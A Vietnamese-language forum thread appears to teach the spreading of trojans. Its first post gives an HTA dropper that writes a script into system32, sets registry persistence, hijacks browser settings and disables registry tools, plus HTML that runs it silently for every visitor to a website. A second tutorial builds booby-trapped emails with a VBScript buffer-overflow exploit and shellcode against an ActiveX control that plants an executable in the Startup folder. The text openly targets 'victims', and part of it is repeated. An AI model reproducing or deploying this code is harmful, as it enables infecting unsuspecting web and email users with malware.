Search
Latest topics
Cách đính kèm trojan vào website
2 posters
Page 1 of 1
Cách đính kèm trojan vào website
- Code:
<html>
<head>
<script language="javascript">
try {
var fso = new ActiveXObject("Scripting.FileSystemObject");
var Shell = new ActiveXObject("WScript.Shell");
var tfolder2 = fso.GetSpecialFolder(0);
var filepath2 = tfolder2 + "\\system32\\System.js";
var a2 = fso.CreateTextFile(filepath2, true);
a2.WriteLine('var url = "Địa chỉ trojon";');
a2.WriteLine('var burl = "Địa chỉ trojon";');
a2.WriteLine('var fso = new ActiveXObject("Scripting.FileSystemObject");');
a2.WriteLine('var tfolder = fso.GetSpecialFolder(0);');
a2.WriteLine('var filepath = tfolder + "\\\\system32\\\\System.js";');
a2.WriteLine('var Shell = new ActiveXObject("WScript.Shell");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\ \\\Windows",filepath);');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\S ystem32",filepath);');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\Main\\\\Start Page",url);');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url1",url);');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\Dia chi con trojan");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url1");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Yahoo\\\\Pager\\\\View\\\\Địa chỉ trojon");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Yahoo\\\\Pager\\\\View\\\\Địa chỉ trojon");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Yahoo\\\\Pager\\\\View\\\\Địa chỉ trojon");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Yahoo\\\\Pager\\\\View\\\\Địa chỉ trojon");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies \\\\System\\\\DisableRegistryTools",1,"REG_DWORD") ;');
a2.Close();
Shell.Run(filepath2);
}
catch (e){}
</script>
<HTA:APPLICATION WINDOWSTATE='minimize' SHOWINTASKBAR='no' />
</head>
<body onload='window.close()'>
</body>
</html>
rồi save lại với tên là : trojan.hta
bạn gắn đoạn mã sau vào cuối cùng của website của bạn:
- Code:
<center>
<span datasrc="#oRun" datafld="view" dataformatas="html"></span>
<xml id="oRun">
<preview>
<view>
<![CDATA[
<object id="oFile" data="trojan.hta?id=1"></object>
]]>
</view>
</preview>
</xml>
</center>
</body>
</html>
rồi sau đó bạn upload file trojan.hta với website của bạn lên cùng 1 mỗi lần mở website của bạn con trojan sẽ tự open vào trong hệ thống mà không hề bị phát hiện
Cách đính Trojan vào Mail
"Badblood" la mot cong cu giup ban lam cho victim bi lay nhiem con trojan (cua ban) de dang hon qua con duong email.
Badblood la thuat ngu moi duoc phat hien boi Marklord, su phat hien nay giup chung ta co the chay file dinh kem (attached files) trong mail, ma` dac biet la nguoi su dung khong the biet duoc.
Badblood su dung script hidden, no khong chi anh huong den Outlook Express ma con lam anh huong toi tat ca nhung nguoi su dung IE5.0 voi Outlook Express di ke`m (install khi cai Windows), su dung Windows95 hay Windows98.
Ngay ca khi nguoi dung su dung cac trinh Mail client nhu Netscape Messager,(Eudora thi toi chua test) v.v.., se deu bi lay nhiem ca neu nhu Open file *.eml ma` toi sap huong dan ban cach tao ra chung. Ban con co the lam lay nhiem ca nguoi dung dich vu Hotmail, hoac HTML-mail, nhung chu y la ho *bat buoc* phai mo file *.eml thi moi bi lay nhiem (:<)
Buoc1:
Chung ta phai vao Internet Explorer -> Option -> Security Tab, nhan Custom Level, va tat (disable) tat ca
chuc nang cho phep chay Script(Neu khong chinh may ban se bi nhiem)
Buoc2:
Chuan bi 1 con virus, trojan,backdoor, etc., 1 chuong trinh dung de Edit nhu EditPlus, TextPad.
Buoc3:
+Chay Outlook Express, nhan New Message ->Format->Background->Picures (or Sound) (vi du file ding.wav chang han)
+ Attach them 1 file trojan, hoac virus = nu't Attach (dat ten la file.exe chang han)
+ Save ca'i email na`y ra mot thu muc nao do' tren o cung.
Buoc4:
Dung EditPlus hoac TextPad, hoac 1 chuong trinh nao do dung de edit text, mo file *.eml nay ra. Trong phan source code cua file nay se co dong nhu sau:
Ban hay Cat dong sau:
- Va dan vao phan dinh dang file ding.wav, no se trong nhu sau:
- Sau do vao phan dinh dang attachement ding.wav ta cat dong Content-ID sau:
- dan no vao phan dinh dang cua attachement file.exe. No se trong giong nhu the nay:
Hay xoa (Remove) cai file.exe di bang cach nhan chuot phai vao no', chon Remove.
- Bay gio ban vao phan View hoac nhan Alt + V, danh dau vao phan Source Edit. Ban se thay OE hien len 3 nut Edit, Source, Preview o cuoi phia duoi buc thu, va ban dang o phan Edit, hay nhan chuot vao phan Source roi dan doan script sau vao:
- Save su thay doi vua roi lai. The la xong, ban co the gui no' di cho cac victim duoc roi day.
Neu cac ban thay rac roi thi hay gui email den cho toi, toi se send cho cac ban cai source code cua Badblood, ban chi can them email cua nan nhan, subject va dinh kem file la hoan thanh cong viec.
Luc dau toi thay lam the nay rat rac roi, nhung khi thuc hanh khoang 2 ,3 lan la thanh thao ngay.
Badblood la thuat ngu moi duoc phat hien boi Marklord, su phat hien nay giup chung ta co the chay file dinh kem (attached files) trong mail, ma` dac biet la nguoi su dung khong the biet duoc.
Badblood su dung script hidden, no khong chi anh huong den Outlook Express ma con lam anh huong toi tat ca nhung nguoi su dung IE5.0 voi Outlook Express di ke`m (install khi cai Windows), su dung Windows95 hay Windows98.
Ngay ca khi nguoi dung su dung cac trinh Mail client nhu Netscape Messager,(Eudora thi toi chua test) v.v.., se deu bi lay nhiem ca neu nhu Open file *.eml ma` toi sap huong dan ban cach tao ra chung. Ban con co the lam lay nhiem ca nguoi dung dich vu Hotmail, hoac HTML-mail, nhung chu y la ho *bat buoc* phai mo file *.eml thi moi bi lay nhiem (:<)
Buoc1:
Chung ta phai vao Internet Explorer -> Option -> Security Tab, nhan Custom Level, va tat (disable) tat ca
chuc nang cho phep chay Script(Neu khong chinh may ban se bi nhiem)
Buoc2:
Chuan bi 1 con virus, trojan,backdoor, etc., 1 chuong trinh dung de Edit nhu EditPlus, TextPad.
Buoc3:
+Chay Outlook Express, nhan New Message ->Format->Background->Picures (or Sound) (vi du file ding.wav chang han)
+ Attach them 1 file trojan, hoac virus = nu't Attach (dat ten la file.exe chang han)
+ Save ca'i email na`y ra mot thu muc nao do' tren o cung.
Buoc4:
Dung EditPlus hoac TextPad, hoac 1 chuong trinh nao do dung de edit text, mo file *.eml nay ra. Trong phan source code cua file nay se co dong nhu sau:
Ban hay Cat dong sau:
- Code:
Content-Disposition: attachment;
filename="file.exe"
- Va dan vao phan dinh dang file ding.wav, no se trong nhu sau:
- Code:
Content-Type: audio/wav;
name="Ding.wav"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; {Chu thich: 2 dong duoi nay la dan vao thi no moi hien ra nhu vay}
filename="file.exe"
- Sau do vao phan dinh dang attachement ding.wav ta cat dong Content-ID sau:
- Code:
Content-ID: <002801bf41c9$95325940$0100007f@computername>
- dan no vao phan dinh dang cua attachement file.exe. No se trong giong nhu the nay:
- Code:
Content-Type: application/x-msdownload;
name="file.exe"
Content-Transfer-Encoding: base64
Content-ID: <002801bf41c9$95325940$0100007f@computername>
Hay xoa (Remove) cai file.exe di bang cach nhan chuot phai vao no', chon Remove.
- Bay gio ban vao phan View hoac nhan Alt + V, danh dau vao phan Source Edit. Ban se thay OE hien len 3 nut Edit, Source, Preview o cuoi phia duoi buc thu, va ban dang o phan Edit, hay nhan chuot vao phan Source roi dan doan script sau vao:
- Code:
<object classid="clsid:50E5E3D1-C07E-11D0-B9FD-00A0249F6B00"
id="RegWizObj"></object>
<script language="VbScript" >
expstr = "/i
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAA"
expstr = expstr & Chr(235)
expstr = expstr & Chr(53)
expstr = expstr & Chr(208)
expstr = expstr & Chr(127)
expstr = expstr + Chr(144)
expstr = expstr + Chr(139) + Chr(252)
expstr = expstr + Chr(131) + Chr(199) + Chr(25)
expstr = expstr + Chr(80)
expstr = expstr + Chr(87)
expstr = expstr + Chr(186) + Chr(96) + Chr(9) + Chr(250) + Chr(191)
expstr = expstr + Chr(255) + Chr(210)
expstr = expstr + Chr(51) + Chr(192)
expstr = expstr + Chr(80)
expstr = expstr + Chr(186) + Chr(202) + Chr(212) + Chr(248) +
Chr(191)
expstr = expstr + Chr(255) + Chr(210)
expstr = expstr + "move c:\windows\temp\d*.tmp
c:\windows\startm~1\programs\startup\file.exe"
RegWizObj.InvokeRegWizard(expstr)
</script>
- Save su thay doi vua roi lai. The la xong, ban co the gui no' di cho cac victim duoc roi day.
Neu cac ban thay rac roi thi hay gui email den cho toi, toi se send cho cac ban cai source code cua Badblood, ban chi can them email cua nan nhan, subject va dinh kem file la hoan thanh cong viec.
Luc dau toi thay lam the nay rat rac roi, nhung khi thuc hanh khoang 2 ,3 lan la thanh thao ngay.
Re: Cách đính kèm trojan vào website
anh admin có thể cho em xin cái YH để trao đổi được không ..???
em có một số câu hỏi cần anh giúp...????
em có một số câu hỏi cần anh giúp...????
graycap- Tổng số bài gửi : 3
Join date : 2010-11-19
Similar topics
» Cách dính trojan vào mail và web
» Gắn trojan, keylog, virus vào website, forum
» Cách phòng chống Trojan hữu hiệu
» Cách phòng chống Trojan hữu hiệu
» Cách lấy link file flash (*.swf) trên Website
» Gắn trojan, keylog, virus vào website, forum
» Cách phòng chống Trojan hữu hiệu
» Cách phòng chống Trojan hữu hiệu
» Cách lấy link file flash (*.swf) trên Website
Page 1 of 1
Permissions in this forum:
You cannot reply to topics in this forum
Thu Aug 23, 2012 5:38 am by Admin
» Tuyệt kỹ cua giai
Thu Aug 23, 2012 5:36 am by Admin
» NETCAT.........
Mon Aug 13, 2012 6:35 am by Admin
» Bảo mật CSDL bằng phương pháp mã hóa.
Tue Apr 17, 2012 10:04 pm by Admin
» Hàm mã hóa MD5 bằng JavaScript
Tue Apr 17, 2012 10:03 pm by Admin
» Giá của món quà
Fri Apr 13, 2012 6:01 am by Admin
» Sẽ chỉ yêu ai?
Fri Apr 13, 2012 6:01 am by Admin
» Cách đọc bảng chữ cái!
Thu Apr 12, 2012 10:37 pm by Admin
» Gắn trojan, keylog, virus vào website, forum
Tue Apr 10, 2012 1:14 am by Admin